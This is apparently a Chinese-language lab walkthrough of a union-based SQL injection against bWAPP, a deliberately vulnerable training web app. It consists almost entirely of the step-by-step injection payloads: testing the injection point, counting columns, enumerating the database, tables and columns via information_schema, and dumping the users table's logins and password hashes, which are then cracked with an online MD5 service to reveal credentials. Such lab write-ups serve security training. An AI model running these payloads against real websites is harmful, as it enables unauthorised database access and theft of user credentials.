1.判断注入点
输入' 提示: near '%'' at line 1
1111' or 1=1 #
无异常
2.判断字段数
' order by 10 #
' order by 7 #
7个字段
3.判断可显示字段:
-1' union select 1,2,3,4,5,6,7 #
2,3,4,5 为可显示字段
4.爆库:
-1' union select 1,database(),3,4,5,6,7 #
库名:bWAPP
5.爆表:
-1' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#
一共5张表,明显我们需要用 users
6.爆字段名
-1' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'#
一共9个字段,我们需要 login,admin,password
7.爆字段内容
-1' union select 1,login,password,4,admin,6,7 from bWAPP.users#
一共两个
8.md5解密 md5在线解密破解,md5解密加密
A.I.M. bug
bee bug